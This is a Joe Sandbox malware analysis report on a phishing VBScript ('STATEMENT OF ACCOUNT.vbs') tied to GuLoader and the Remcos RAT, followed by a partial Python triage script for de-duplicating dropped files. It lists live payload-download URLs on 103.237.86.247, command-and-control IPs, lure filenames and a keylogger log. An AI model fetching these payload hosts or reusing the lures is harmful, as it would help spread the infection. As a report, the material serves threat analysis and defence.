                unknown
                http://103.237.86.247/Udmagret.powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://aefd.nelreports.net/api/report?cat=bingaotbhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                http://103.237.86.247/Udmagret.hhpowershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://aefd.nelreports.net/api/report?cat=bingrmsbhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://www.google.com/accounts/serviceloginwab.exefalse
                • Avira URL Cloud: safe
                unknown
                https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://aka.ms/pscore68powershell.exe, 00000001.00000002.2293994256.0000026CD65D1000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                http://103.23powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhv3B88.tmp.10.dr, bhv5123.tmp.13.drfalse
                • Avira URL Cloud: safe
                unknown
                http://www.ebuddy.comwab.exe, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
103.237.87.159 | unknown | unknown | 133587 | BGNR-AP2BainandCompanySG | true
103.237.86.247 | unknown | unknown | 133587 | BGNR-AP2BainandCompanySG | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1465957
Start date and time: 2024-07-02 10:26:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: STATEMENT OF ACCOUNT.vbs
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winVBS@26/15@1/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 168
• Number of non-executed functions: 286
Cookbook Comments:
• Found application associated with file extension: .vbs
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 93.184.221.240
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5352 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7372 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:26:59 | API Interceptor | 1x Sleep call for process: wscript.exe modified
04:27:01 | API Interceptor | 128x Sleep call for process: powershell.exe modified
04:28:23 | API Interceptor | 472567x Sleep call for process: wab.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
178.237.33.50 | 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe | malicious | DBatLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | SOA.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | Payment Confirmation.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | SOA.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | Vyuctovani_2024_07-1206812497#U00b7pdf.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | 6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | HUED23EDE5UGRFQ.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | DHL Shipping Document Awb & BL.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | tWitaq427K.exe | malicious | Remcos, AgentTesla | geoplugin.net/json.gp
178.237.33.50 | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp
103.237.87.159 | Statement Of Account (2).vbs | malicious | Remcos, GuLoader |
103.237.86.247 | SOA.vbs | malicious | Remcos, GuLoader | 103.237.86.247/mbLXhRfFSSN77.bin
103.237.86.247 | Payment Confirmation.vbs | malicious | Remcos, GuLoader | 103.237.86.247/nsQUkTChtPKgp70.bin
103.237.86.247 | SOA.vbs | malicious | Remcos, GuLoader | 103.237.86.247/qOreedem137.bin
103.237.86.247 | Statement Of Account (2).vbs | malicious | Remcos, GuLoader | 103.237.86.247/YckNurPLCcwPGiweiCyGTJ2.bin
103.237.86.247 | Payment Copy.vbs | malicious | Remcos, GuLoader | 103.237.86.247/JrFdfe171.bin
Match | Associated Sample Name / URL | Detection | Threat Name | Context
geoplugin.net | 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe | malicious | DBatLoader, Remcos | 178.237.33.50
geoplugin.net | SOA.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Payment Confirmation.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | SOA.vbs | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | Vyuctovani_2024_07-1206812497#U00b7pdf.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | 6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | HUED23EDE5UGRFQ.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | DHL Shipping Document Awb & BL.vbs | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | tWitaq427K.exe | malicious | Remcos, AgentTesla | 178.237.33.50
geoplugin.net | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
BGNR-AP2BainandCompanySG | SOA.vbs | malicious | Remcos, GuLoader | 103.237.87.32
BGNR-AP2BainandCompanySG | Payment Confirmation.vbs | malicious | Remcos, GuLoader | 103.237.86.247
BGNR-AP2BainandCompanySG | SOA.vbs | malicious | Remcos, GuLoader | 103.237.86.247
BGNR-AP2BainandCompanySG | Statement Of Account (2).vbs | malicious | Remcos, GuLoader | 103.237.86.247
BGNR-AP2BainandCompanySG | Payment Copy.vbs | malicious | Remcos, GuLoader | 103.237.86.247
BGNR-AP2BainandCompanySG | YHZb2CeJdY.elf | malicious | Mirai, Okiru | 103.237.87.90
BGNR-AP2BainandCompanySG | lVlJfRiCLE.elf | malicious | Mirai, Okiru | 103.237.87.90
BGNR-AP2BainandCompanySG | TKX7tZs372.elf | malicious | Mirai, Okiru | 103.237.87.90
BGNR-AP2BainandCompanySG | 3B3W5byB4W.elf | malicious | Mirai, Okiru | 103.237.87.90
BGNR-AP2BainandCompanySG | jkeqHGu4is.elf | malicious | Mirai, Okiru | 103.237.87.90
ATOM86-ASATOM86NL | 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe | malicious | DBatLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | SOA.vbs | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | Payment Confirmation.vbs | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | SOA.vbs | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | Vyuctovani_2024_07-1206812497#U00b7pdf.exe | malicious | Remcos, GuLoader | 178.237.33.50
ATOM86-ASATOM86NL | 6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | HUED23EDE5UGRFQ.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | DHL Shipping Document Awb & BL.vbs | malicious | GuLoader, Remcos | 178.237.33.50
ATOM86-ASATOM86NL | tWitaq427K.exe | malicious | Remcos, AgentTesla | 178.237.33.50
ATOM86-ASATOM86NL | TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbs | malicious | GuLoader, Remcos | 178.237.33.50
                  No context
                  No context
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: data
Category: dropped
Size (bytes): 144
Entropy (8bit): 3.356983879725943
Encrypted: false
SSDEEP: 3:rhlKlVHrYLcl5JWRal2Jl+7R0DAlBG45klovDl6v:6lVs45YcIeeDAlOWAv
MD5: A6F78E3DE460830CAD017D79D29ECA49
SHA1: 0586EFC6F224C0A71F2ADC7DBDE5CBC28E17D745
SHA-256: 9C392FBACD3139EB660AD7C1FCE61B1048F6883683415497C861A1FADF391409
SHA-512: 3775C88B7208E1210FC328DCC1EEA34D2BA878C5362E3643612797E158A0C89093E27822102745CA900DB3CE635634F273D8958620D218E8C3F6004F4E3A1A23
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                  Preview:....[.2.0.2.4./.0.7./.0.2. .0.4.:.2.7.:.5.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
Process: C:\Windows\System32\wscript.exe
File Type: Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category: dropped
Size (bytes): 71954
Entropy (8bit): 7.996617769952133
Encrypted: true
SSDEEP: 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5: 49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1: 1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256: B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512: BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious: false
                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
Process: C:\Windows\System32\wscript.exe
File Type: data
Category: dropped
Size (bytes): 328
Entropy (8bit): 3.1196963549884558
Encrypted: false
SSDEEP: 6:kKU99UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:8kDnLNkPlE99SNxAhUe/3
MD5: BEA69D4A4DA63A363C02F20838911FB1
SHA1: E045CEDB7191A7702BDD572F10CE90D4BEDD97AA
SHA-256: 83EF388C16303C52675240C20DEDDFD03D92AB84F6C60003A5F54BDF613B3CAF
SHA-512: 6F9D05D9CB5BE914BD3BB8B68A2DA270C36B2584D2C60712995E9646BC93DEBC265A8795A921B15FA2B56A9D0F65B7D363DF05323FD89AE78B8534270103C739
Malicious: false
                  Preview:p...... ........ ...Y...(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: JSON data
Category: dropped
Size (bytes): 962
Entropy (8bit): 5.013811273052389
Encrypted: false
SSDEEP: 12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: 18BC6D34FABB00C1E30D98E8DAEC814A
SHA1: D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256: 862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512: 8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious: false
                  Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 11608
Entropy (8bit): 4.8908305915084105
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
MD5: DD89E182EEC1B964E2EEFE5F8889DCD7
SHA1: 326A3754A1334C32056811411E0C5C96F8BFBBEE
SHA-256: 383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
SHA-512: B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
Malicious: false
                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):1.1940658735648508
                  Encrypted:false
                  SSDEEP:3:Nlllul3nqth:NllUa
                  MD5:851531B4FD612B0BC7891B3F401A478F
                  SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                  SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                  SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                  Malicious:false
                  Preview:@...e.................................&..............@..........
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x97b8c478, page size 32768, DirtyShutdown, Windows version 10.0
                  Category:dropped
                  Size (bytes):20447232
                  Entropy (8bit):1.282724092026394
                  Encrypted:false
                  SSDEEP:12288:iiokyOs87IKSOfvKD52x+2e5cjzFTH/EREF:FZsJTDM+
                  MD5:2B2682BCD0C16B506F841405FB609FDF
                  SHA1:D951E12BBE8F6B5D4F467FD3F5A37D96175EF629
                  SHA-256:6CB03DA76AB944092369190459AB85078C1CF9C995783D3423A433CB8751A0FC
                  SHA-512:8CAEA02B5CFD74F1F40C43720B098D012923BB7BC105E37A9ED1DF41F31BC41F87AAD09D5B82B96E3E0A72FB0F18C7E2EEC3CD874D9F29A77A3A644E609D5FB2
                  Malicious:false
                  Preview:...x... ........=......J}...0...{........................"..........{.......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;.................................p.e......{...................-......{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x97b8c478, page size 32768, DirtyShutdown, Windows version 10.0
                  Category:dropped
                  Size (bytes):20447232
                  Entropy (8bit):1.282724092026394
                  Encrypted:false
                  SSDEEP:12288:iiokyOs87IKSOfvKD52x+2e5cjzFTH/EREF:FZsJTDM+
                  MD5:2B2682BCD0C16B506F841405FB609FDF
                  SHA1:D951E12BBE8F6B5D4F467FD3F5A37D96175EF629
                  SHA-256:6CB03DA76AB944092369190459AB85078C1CF9C995783D3423A433CB8751A0FC
                  SHA-512:8CAEA02B5CFD74F1F40C43720B098D012923BB7BC105E37A9ED1DF41F31BC41F87AAD09D5B82B96E3E0A72FB0F18C7E2EEC3CD874D9F29A77A3A644E609D5FB2
                  Malicious:false
                  Preview:...x... ........=......J}...0...{........................"..........{.......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;.................................p.e......{...................-......{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                  Category:dropped
                  Size (bytes):2
                  Entropy (8bit):1.0
                  Encrypted:false
                  SSDEEP:3:Qn:Qn
                  MD5:F3B25701FE362EC84616A93A45CE9998
                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                  Malicious:false
                  Preview:..
                  Process:C:\Program Files (x86)\Windows Mail\wab.exe
                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                  Category:dropped
                  Size (bytes):2
                  Entropy (8bit):1.0
                  Encrypted:false
                  SSDEEP:3:Qn:Qn
                  MD5:F3B25701FE362EC84616A93A45CE9998
                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                  Malicious:false
                  Preview:..
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:dropped
                  Size (bytes):459120
                  Entropy (8bit):5.856893664227236
                  Encrypted:false
                  SSDEEP:12288:YJx+XiX6EVg2riq3BpFxfBdxPadN1RQtoNTiX4e:Y/+4Vg0X3tadHRQt8mR
                  MD5:E3CAB8D063E34C00E20F8471C7139F8A
                  SHA1:3989A2C4B539E6DAC33FDA4C13F980FB46C24537
                  SHA-256:095EB2A212EC912605CDCDE4DEB442B7539C0724C868EB9FD6E1DDC7D3381620
                  SHA-512:E8FCBEBE748AAA6355EB8190E1F42C96DA946F1A87ABB4051C2914CCD9F3C8A70C521A9C26C5F37F76C70E6482FD162CFDBEAE5B7C876C7EDDAD497CCBA36512
                  Malicious:false
                   Preview:
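Several of the dropped-file records above are hash-identical copies written by different PowerShell instances, and two of them (the 60-byte "# PowerShell test file to determine AppLocker lockdown mode" file and the PSMODULECACHE blob) are artefacts PowerShell itself creates on start-up rather than anything the sample dropped. The following is an added example, not part of the Joe Sandbox report, that parses records in the report's Key:Value layout, collapses them by SHA-256 and tags those two known-benign artefacts so an analyst can skip them. The sample text is constructed from four of the records above with only the keys the triage needs; the benign-artefact labels are the author's assumption about what those files are, not something the report states.

```python
from collections import defaultdict

# Constructed sample: four dropped-file records in the report's "Key:Value"
# layout. Hashes, sizes and previews are the report's own values; the list of
# keys is trimmed to those the triage uses.
SAMPLE_TEXT = """\
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:data
Category:modified
Size (bytes):11608
SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
Malicious:false
Preview:PSMODULECACHE......)..z..S...C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1
Process:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\\Program Files (x86)\\Windows Mail\\wab.exe
File Type:Unicode text, UTF-16, little-endian text, with no line terminators
Category:dropped
Size (bytes):2
SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
Malicious:false
Preview:..
"""

# Host-side files PowerShell writes on every start-up, matched on the preview
# bytes (assumption by the example author, not a statement from the report).
# They appear in nearly any sandbox run that spawns powershell.exe.
KNOWN_BENIGN = (
    ("# PowerShell test file to determine AppLocker lockdown mode",
     "PowerShell AppLocker probe (__PSScriptPolicyTest_*.ps1)"),
    ("PSMODULECACHE", "PowerShell ModuleAnalysisCache"),
)


def parse_records(text: str) -> list:
    """Split the flat Key:Value dump into one dict per file; a new record
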